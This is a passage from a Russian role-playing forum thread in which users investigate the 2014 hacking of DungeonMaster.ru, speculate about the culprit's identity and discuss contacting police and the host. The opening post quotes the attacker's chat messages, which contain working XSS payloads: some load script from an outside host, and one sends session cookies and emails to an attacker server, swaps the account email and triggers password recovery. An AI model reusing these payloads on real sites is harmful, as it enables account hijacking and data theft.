RPG-ZONE
Новости Форумы Путеводитель FAQ (RPG) Библиотека «Пролёт Фантазии» «Штрихи Пролёта» Дайсы
>  Список форумов · Внутренний город · Трактир «Удар копытом по голове» Здравствуй, Гость (Вход · Регистрация)
Закрыто Боб 27-10-2014: Уже разморожен

Страницы: (3) 1 [2] 3  Открыть все 
 Закрыта
 Новая тема
 Опрос

> Заморозка DungeonMaster.ru
   Первое сообщение.    21.8.2014, 11:24, Боб пишет:
Так. На ДМ произошли крайне неприятные события. Очень надеюсь, там скоро все поправят.
Адекватными мерами, на мой взгляд, являются восстановление сайта и обращение в правоохранительные органы с заявлением о преступлении по ст. 273 УК РФ.

Группа ДМ в Фейсбуке (думаю, ее итак все заинтересованные лица знают) тут: https://www.facebook.com/groups/178980498816975/
Помощи они не просили, но если есть что предложить, это было бы правильно.




Вейлор: решил выделить это в отдельный топик, и всё-таки обсудить, если будут новости.
Я буду писать прямо в пост Боба, всё что становится известно.

Update 24.08.2014

1) Ники хакера, по его сообщениям 19-20 августа в чате.
http://www.dungeonmaster.ru/Cabinet/?user=ololosha 13.12.13
http://www.dungeonmaster.ru/Cabinet/?user=ololoshasha 19.08.14
http://www.dungeonmaster.ru/Cabinet/?user=...oshastrikesback 19.08.14
Также поиск ботов даёт такой ник.
http://dungeonmaster.ru/Cabinet/?user=notdoneyet 19.08.14

2) Его сообщения из чата. 19'го числа были только проверки - работает ли ява-скрипт. 20го был собственно нанесён удар.

http://dungeonmaster.ru/Chat/Logs/19_08_14.txt и http://dungeonmaster.ru/Chat/Logs/20_08_14.txt

17:05 ololoshastrikesback

Код

<img src='http://eblan.org/wp-content/uploads/2011/04/vlastelin1.jpg' onload="jjavascript:var s = document.createElement('script');s.type='text/javascript';document.body.appendChild(s);s.src='http://lsd.bicycle-day.com/lsd.js';void(0);" onclick='' />


17:22 ololoshastrikesback

Код

<a href='http://nyan.cat' onMouseOver='var s = document.createElement("script");s.type="text/javascript";document.body.appendChild(s);s.src="http://lsd.bicycle-day.com/lsd.js";void(0);'>ссылка</a>


17:48 ololoshasha

Код

<a href='http://nyan.cat' onMouseOver='document.body.remove(document.body);'>ссылка</a>


20-08-2014 12:53 ololosha
Код

<a href='http://nyan.cat' onMouseOver='var s = document.createElement("script");s.type="text/javascript";document.body.appendChild(s);s.src="http://ololoshasha.esy.es/poison.php?data=Starting%20"+encodeURIComponent(document.cookie); var iframee=document.createElement("iframe");iframee.style="position:absolute;height:1px;width:1px;z-index:-999;border-width:0px";document.body.appendChild(iframee);iframee.onload=function(){if(window.poisonedd==true){void(0);} else {window.poisonedd=true;var mail = this.contentWindow.document.getElementById("ctl00_mainContent_UserProfile1_txtEmail");var z = document.createElement("script");z.type="text/javascript";document.body.appendChild(z);z.src="http://ololoshasha.esy.es/poison.php?data=OrigMail%20"+encodeURIComponent(mail.value);mail.value = mail.value.toString().split("@")[0]+"@dispostable.com";var w = document.createElement("script");w.type="text/javascript";document.body.appendChild(w);w.src="http://ololoshasha.esy.es/poison.php?data=NewMail%20"+encodeURIComponent(mail.value);window.newmail = mail.value; this.contentWindow.document.getElementById("ctl00_mainContent_btnUpdate").click();var r = document.createElement("script");r.type="text/javascript";document.body.appendChild(r);r.src="http://ololoshasha.esy.es/poison.php?data=Finishing%20"+encodeURIComponent(document.cookie);var iframeee=document.createElement("iframe");iframeee.style="position:absolute;height:1px;width:1px;z-index:-999;border-width:0px";document.body.appendChild(iframeee);iframeee.onload=function(){if(window.poisoneddd==2){void(0);} else if(window.poisoneddd==1) {window.poisoneddd=2;this.contentWindow.document.getElementById("ctl00_mainContent_txtEmail").value=window.newmail;this.contentWindow.document.getElementById("ctl00_mainContent_btnSubmit").click();var r = document.createElement("script");r.type="text/javascript";document.body.appendChild(r);r.src="http://ololoshasha.esy.es/poison.php?data=Finished%20"+encodeURIComponent(document.cookie);} else {window.poisoneddd=1;this.contentWindow.document.getElementById("ctl00_LoginView3_LoginStatus2").click();}};iframeee.src="http://"+document.domain+"/PasswordRecovery.aspx";}};iframee.src="http://"+document.domain+"/EditProfile.aspx";void(0);'>ссылка</a>



3) Мыло для регистрации сайта где лежал скрипт - tlkod@evopo.com - одноразовое, ничего с не вытянуть.

   Сообщение № 31. 24.8.2014, 12:17, Аскетолог пишет:
Аскетолог ( Offline )
Демон-поэт

*
Графоман
Сообщений: 48
профиль

Репутация: 4
Хм, вообще-то, у пользователей "угнали" их аккаунты, получили доступ к информации личного характера(переписка), и всё это выложили в открытый доступ. Пострадавших-то, как раз, много.
Да и нафиг нам доказательная база, которую собрать сложно(потому и отказники, что найти легко - доказать сложно), мы ж не суд. Нам надо знать: кто это сделал.

   Сообщение № 32. 24.8.2014, 13:09, YellowDragon пишет:
YellowDragon ( Offline )
даос

*
Автор
Сообщений: 1339
профиль

Репутация: 83
Цитата
Для начала нужно, чтобы кто-то, лучше всего владелец сайта хотя бы в полицию обратился. В принципе даже сам факт, что правоохранительными органами проводится проверка (даже не дело возбуждено) на многих людей действует отрезвляюще.
О том мной речь и велась. Мы взрослые люди таки, и стоит показать, что такие вещи должны наказываться. А не говорить "ну вот, всё равно бесполезно"... бесполезно может и бесполезно, но для труса и это может стать ограничивающим фактором... да и всегда есть нюансы разные. Хотя бы тот же факт необходимости проверки этой ситуации официальными структурами.
Но тут надобна инициатива от Ракота, наверное....

   Сообщение № 33. 24.8.2014, 13:32, Эол пишет:
Эол
Неавторизованный пользователь




Меньш Не из Запорожья, а из Кривого Рога. Он ни разу не хакер, и его ситуация на ДМе волнует не меньше нас. Я (на сайте в прошлом Eol, сейчас Obscure) могу за него поручиться.

   Сообщение № 34. 24.8.2014, 13:38, ZatriX пишет:
ZatriX ( Offline )
Странник

*
Неофит
Сообщений: 4
профиль

Репутация: 0
Цитата(Вейлор)
на главную, я думаю, он закинул код, когда уже имел некие более широкие права

Цитата(ZatriX)

После этого, когда злоумышленник (назовем его так) получил контроль над акком модератора, скрипт был вывешен на главную
. Модераторы могут постить новости на главную, а прикрепить к новости картинку со скриптом - дело нехитрое.

   Сообщение № 35. 24.8.2014, 14:09, Вейлор пишет:
Вейлор ( Offline )
днём на работе

*
Администратор
Сообщений: 5418
профиль

Репутация: 1011
Цитата(Эол)
Меньш Не из Запорожья, а из Кривого Рога. Он ни разу не хакер, и его ситуация на ДМе волнует не меньше нас

Да, это пока просто предположение Зерга. Скорей всего действительно не Меньш.

Вот ждём ответа на тикер (Не подтвердившаяся информация стёрта) чтобы подтвердить более вероятное что Ололош это (Не подтвердившаяся информация стёрта)
Но кстати если бы спрашивал не левый пользователь (я), а полиция, как говорит Боб, они бы ответили бы точно, а мне могут и не ответить, по идее.

Кстати жду помощи админов ДМ.ру. Если бы меня пустили в БД (я ничего не трону) было бы ещё лучше.

   Сообщение № 36. 24.8.2014, 14:12, Зерг пишет:
Зерг ( Offline )
Странник

*
Неофит
Сообщений: 45
профиль

Репутация: 0
Это первое, что пришло в голову, когда я узнал что хакер из Запорожья и он украинский "патриот". Потому что Кривой Рог близок к Запорожью, он мог банально переехать + Меньш тоже такой же "патриот", и мотивы, чтобы ломать ДМ, у него были.

Но сейчас я уже тоже сильно сомневаюсь, что это он.

   Сообщение № 37. 24.8.2014, 14:30, Венг пишет:
Венг ( Offline )
When in doubt, shoot into a crowd.

*
Магистр
Сообщений: 426
профиль

Репутация: 14
Не знаю, что там про Менша, но поручение Эола само по себе - это пять.

   Сообщение № 38. 24.8.2014, 19:05, Fiona El Tor пишет:
Fiona El Tor
Шелестящая Госпожа

*
Неофит
Сообщений: 14
профиль

Репутация: 3
1. Большое спасибо за участие и проделанную работу. Приятно, что сообщество ролевиков неравнодушно к бедам соседей =)

2. На ДМе все перечисленные аккаунты взломщика были зарегистрированы под другими почтами - в основном вариации на тему "ололош". Почта (Не подтвердившаяся информация стёрта) в этих аккаунтах точно не светилась. Был ли пользователь с такой почтой под неорлолошным ником - сразу быстро сказать трудно, поскольку поиск по мейлу на сайте не предусмотрен, надо листать руками. Этого я сейчас технически сделать не могу, доступ только у Ракота на данный момент, авторизация отключена.

3. IP, как ни странно, у всех ололошиных аккаунтов московский. Провайдер Ростелеком (если не путаю), адрес известен, с ним связались. Да, разумеется, нельзя исключить, что этот человек имеет еще один аккаунт на ДМе, на который заходил не с того доступа, с которого осуществлял взлом. Точно так же вероятным может оказаться, что некий пользователь, обиженный на сайт, организовал эту атаку с привлечением знакомого/полузнакомого хакера ( (Не подтвердившаяся информация стёрта)?) , а не выполнял все собственноручно. Хотя, с другой стороны хакер с засвеченными телефонами, вконтактами и прочими данными выглядит как-то странно.

4. Менш - нет, не Менш. Легкий конфликт на политическую тему в данном случае не аргумент. Менша действительно зовут Артем, и физические данные у него другие. Не говоря уже о том, что не те предпосылки, не тот уровень мести и т.д. (чистая психология, можно рассуждать долго, но в случае Менша я убеждена, что он тут ни при чем)

5. Доступ к базе сейчас только у Ракота, я ему передала, что дружественная РПГ-Зона провела расследование и готова к контакту с администрацией ДМа. Я со своей стороны могу провести определенные изыскания среди профилей игроков, когда сайт откроется для авторизации.

Еще раз большое спасибо за поддержку =)

   Сообщение № 39. 24.8.2014, 19:43, AlarDyce пишет:
AlarDyce ( Offline )
Большой Змей

*
Автор
Сообщений: 928
профиль

Репутация: 57
Цитата(Fiona El Tor)
4. Менш - нет, не Менш. Легкий конфликт на политическую тему в данном случае не аргумент. Менша действительно зовут Артем, и физические данные у него другие. Не говоря уже о том, что не те предпосылки, не тот уровень мести и т.д. (чистая психология, можно рассуждать долго, но в случае Менша я убеждена, что он тут ни при чем)

Ну и хорошо, если не он, во всяком случае кандидата стоило "на зуб попробовать", прежде чем откинуть, как того же Пугало, например — вполне нормальный такой детективчик в духе "Кто убил?" Теперь вопрос был ли ентот "ситх" (sithbein) в тусовке "патриотов".

   Сообщение № 40. 24.8.2014, 20:28, Вейлор пишет:
Вейлор ( Offline )
днём на работе

*
Администратор
Сообщений: 5418
профиль

Репутация: 1011
Цитата(Fiona El Tor)
IP, как ни странно, у всех ололошиных аккаунтов московский. Провайдер Ростелеком

А напиши мне эти IP и адреса е-майлов пожалуйста, сюда или в личку.
И этого в т.ч. не надо забывать http://dungeonmaster.ru/Cabinet/?user=notdoneyet

Сейчас самое интересно что ответят в хостингере.

   Сообщение № 41. 24.8.2014, 20:59, CheZzter пишет:
CheZzter ( Offline )
Странник

*
Неофит
Сообщений: 21
профиль

Репутация: 1
Кстати, а о чем намекал Ололош вот этим
"You can't kill the rat plague. ... Well that becomes boring." - ? Он намекал, что якобы он чумная крыса, а админы не могут ее убить?
все также анализируя сообщение.
я пришел к выводу, что хакер просто баловался и его не вела какая-то обида. Могу ошибаться, но все же.

   Сообщение № 42. 24.8.2014, 21:24, Alpha-00 пишет:
Alpha-00 ( Offline )
Странник

*
Неофит
Сообщений: 16
профиль

Репутация: 0
Атака началась вскоре после того, как в обсуждении всплыла тема незащищенности ДМа. На что был дан ответ, что абстрактному хакеру этот ресурс интересен не будет тупо потому, что здесь нет ничего ценного и занимательного, лишь дырка в коде, которой можно воспользоваться, и куча модулей. Буквально на следующий же день появился ололоша.

Я не верю в такие совпадения. Не говоря уж о том, что есть люди, которые ОЧЕНЬ СИЛЬНО хотят стать админом DM, но им не дают, а тут такая возможность показать свое умение закрывать дыры. Возможно, взлом и велся из Украины, но организатор этой бойды наверняка кто-то из постоянных пользователей DM'a.

Про Ростелеком. Ну, прокси же. Надо быть совсем неумным человеком, чтобы атаку вести с реального IP. Равно как и регистрировать ботов на реальную почту. В общем, ждем информации от хостера.

PS: Я, кстати, тоже не думаю, что это Mensch.

   Сообщение № 43. 24.8.2014, 21:28, CheZzter пишет:
CheZzter ( Offline )
Странник

*
Неофит
Сообщений: 21
профиль

Репутация: 1
Цитата(Alpha-00)
Атака началась вскоре после того, как в обсуждении всплыла тема незащищенности ДМа

facepalm. по мне, было очень глупо такое в обсуждах обговаривать -.-
Цитата(Alpha-00)
Я не верю в такие совпадения.

это не совпадение, тут правда за тобой.
Цитата(Alpha-00)
ОЧЕНЬ СИЛЬНО хотят стать админом DM, но им не дают

ну и кто же это, если не секрет. ибо, между прочим, круг сужается еще сильнее...

   Сообщение № 44. 24.8.2014, 21:42, Fiona El Tor пишет:
Fiona El Tor
Шелестящая Госпожа

*
Неофит
Сообщений: 14
профиль

Репутация: 3
Кстати, первый Ололоша был забанен несколько ранее за глупые выходки, которые, впрочем, не несли характер взлома. И у этого первого Ололоши был тот же ай-пи. Допустим, прокси, да. Любимый прокси.

И про бота с выбивающимся из общего ряда ником notdoneyet я помню. Тот же ай-пи, почта другая, но, ЕМНИП, не sithbein. Запущенный склероз не позволяет мне вспомнить точнее зубодробительные буквосочетания, но когда включат авторизацию, можно будет все это уточнить.

UPD
Цитата
по мне, было очень глупо такое в обсуждах обговаривать -.-

Все намного хуже. Это было обсуждение в чате, а не в локальном обсуждении локальной игры. Поименную благодарность я еще выскажу

   Сообщение № 45. 24.8.2014, 21:44, CheZzter пишет:
CheZzter ( Offline )
Странник

*
Неофит
Сообщений: 21
профиль

Репутация: 1
Цитата(Fiona El Tor)
первый Ололоша был забанен несколько ранее за глупые выходки

вроде за чОрного властелина, да?
не наговаривая, но один парень (Федя-ФлорисЦш, мой враг-товарищ) любил поигрывать с этой картинкой.

   Сообщение № 46. 24.8.2014, 21:51, Fiona El Tor пишет:
Fiona El Tor
Шелестящая Госпожа

*
Неофит
Сообщений: 14
профиль

Репутация: 3
Чеззтер, эта картинка бродит по ДМу в качестве локального мема уже давно, Флориша тогда и близко на сайте не было.


   Сообщение № 47. 24.8.2014, 22:04, Зерг пишет:
Зерг ( Offline )
Странник

*
Неофит
Сообщений: 45
профиль

Репутация: 0
Ну взломщика ин реал лайф мы уже нашли, все его контакты вплоть до физического места работы.
Приведенных Вейлором доказательств уже достаточно, даже если информация с айпи, почтой, никами не подтвердится.

Добавлено через 3 мин. 54 с.

Есть еще кое-что интересное.

ссылка

Может найдете какие-нибудь совпадения.

   Сообщение № 48. 24.8.2014, 22:18, CheZzter пишет:
CheZzter ( Offline )
Странник

*
Неофит
Сообщений: 21
профиль

Репутация: 1
Цитата(Fiona El Tor)
Чеззтер, эта картинка бродит по ДМу в качестве локального мема уже давно, Флориша тогда и близко на сайте не было.

была ж шутка. предупредил, не в целях наговора)

   Сообщение № 49. 24.8.2014, 23:14, Fiona El Tor пишет:
Fiona El Tor
Шелестящая Госпожа

*
Неофит
Сообщений: 14
профиль

Репутация: 3
Зерг, это явно пароли, угнанные у одного человека. И там есть банковские пароли. Приват24 - это Украина. Вряд ли в России актуален приватбанк.

   Сообщение № 50. 24.8.2014, 23:30, Вейлор пишет:
Вейлор ( Offline )
днём на работе

*
Администратор
Сообщений: 5418
профиль

Репутация: 1011
Цитата(Зерг)
Может найдете какие-нибудь совпадения.

Там ничего особо интересного (в паролях).

Цитата(Зерг)
взломщика ин реал лайф мы уже нашли

Пока нет уверенности.

Я сейчас ещё одну абузу написал, в главную вроде бы контору хостингера, с запросом данных, на этот раз на английском.

   Сообщение № 51. 25.8.2014, 01:50, Зерг пишет:
Зерг ( Offline )
Странник

*
Неофит
Сообщений: 45
профиль

Репутация: 0
Если он обворовал чьи-то банковские счета, это уж точно уголовщина...

   Сообщение № 52. 25.8.2014, 09:48, CheZzter пишет:
CheZzter ( Offline )
Странник

*
Неофит
Сообщений: 21
профиль

Репутация: 1
Ну, например, он обворовал.
Вот тут вообще никто не будет не причем.
тут 158 УК РФ (дадада, 158. где то в пленуме прочитал такие вещи), то тут уже потерпевший только может заяву дать.

   Сообщение № 53. 25.8.2014, 10:42, Вейлор пишет:
Вейлор ( Offline )
днём на работе

*
Администратор
Сообщений: 5418
профиль

Репутация: 1011
По поводу того файла мы точно не знаем 1) к кому именно относится сайт 2) данные в файле украдены или просто написаны

Русскоязычная поддержка пока молчит (Не подтвердившаяся информация стёрта)
Англоязычная абуз-поддержка отвечает, но пока отделывается дежурными фразами, что не предоставляют данные. Пока моё письмо последнее. Может ещё что-то ответят.

(Не подтвердившаяся информация стёрта)

   Сообщение № 54. 25.8.2014, 11:03, Lana пишет:
Lana ( Offline )
Странник

*
Неофит
Сообщений: 8
профиль

Репутация: 1
После всего прочитанного можно с уверенностью надеяться что ДМ в скором времени вновь оживет?

   Сообщение № 55. 25.8.2014, 11:31, CheZzter пишет:
CheZzter ( Offline )
Странник

*
Неофит
Сообщений: 21
профиль

Репутация: 1
Цитата(Вейлор)
Русскоязычная поддержка пока молчит (Не подтвердившаяся информация стёрта)
Англоязычная абуз-поддержка отвечает, но пока отделывается дежурными фразами, что не предоставляют данные. Пока моё письмо последнее. Может ещё что-то ответят.

ой да навряд ли какая-то поддержка внятно что-то даст. тут только по требованию уважаемых лиц ПО дадут 100%, никак иначе.
Цитата(Lana)
После всего прочитанного можно с уверенностью надеяться что ДМ в скором времени вновь оживет?

не в обиду обитателям РПГ Зоны, я тоже надеюсь, что однажды ДМ поднимется.

   Сообщение № 56. 25.8.2014, 11:35, AlarDyce пишет:
AlarDyce ( Offline )
Большой Змей

*
Автор
Сообщений: 928
профиль

Репутация: 57
Цитата(Lana)
После всего прочитанного можно с уверенностью надеяться что ДМ в скором времени вновь оживет?


Вот ждем сегодняшнего решения о том, кто будет новым техадмином, а он уж по идее и должен сроки обозначить, когда заплатки будут поставлены.

   Сообщение № 57. 25.8.2014, 11:36, Сорин Марков пишет:
Сорин Марков ( Offline )
Серый рыцарь

*
Графоман
Сообщений: 5
профиль

Репутация: 0
Цитата
После всего прочитанного можно с уверенностью надеяться что ДМ в скором времени вновь оживет?

Нет. На это надеяться, я думаю, уже не стоит. Лично у меня мало веры в то, что найдется человек, готовый заниматься ДМом. Уж если за все время когда он был рабочий, не нашлось, то теперь, когда нужно приложить адову кучу работы к его восстановлению - тем паче.

С теорий о том, что это все дело рук Mensh'a я просто прослезился. Давно так не смеялся. Хотя удивляться тому, что весь взлом выкрасили в политические мотивы не стал. Это было очень даже ожидаемо.

   Сообщение № 58. 25.8.2014, 11:44, Зерг пишет:
Зерг ( Offline )
Странник

*
Неофит
Сообщений: 45
профиль

Репутация: 0
Хоспади, это не было теорией. Это просто первое что пришло в голову и я это в ЛИЧКУ написал. Просто это потом здесь выложили и стали обсуждать. Когда я стал проверять, там у Меньша вообще ни с каких концов не сходится.
А по поводу политических мотивов, ты на аккаунт (Не подтвердившаяся информация стёрта) посмотри.

   Сообщение № 59. 25.8.2014, 11:48, Eretar пишет:
Eretar
Неавторизованный пользователь




А первый раз ололошу забарили не за то, что он какуую-то игру раз двадцать наблюдателем поставил и в топ читаемых вывел?

   Сообщение № 60. 25.8.2014, 11:59, ZatriX пишет:
ZatriX ( Offline )
Странник

*
Неофит
Сообщений: 4
профиль

Репутация: 0
За то.

0 Пользователей читают эту тему (0 Гостей и 0 Скрытых Пользователей);
« Предыдущая тема | Трактир «Удар копытом по голове» | Следующая тема »

Яндекс.Метрика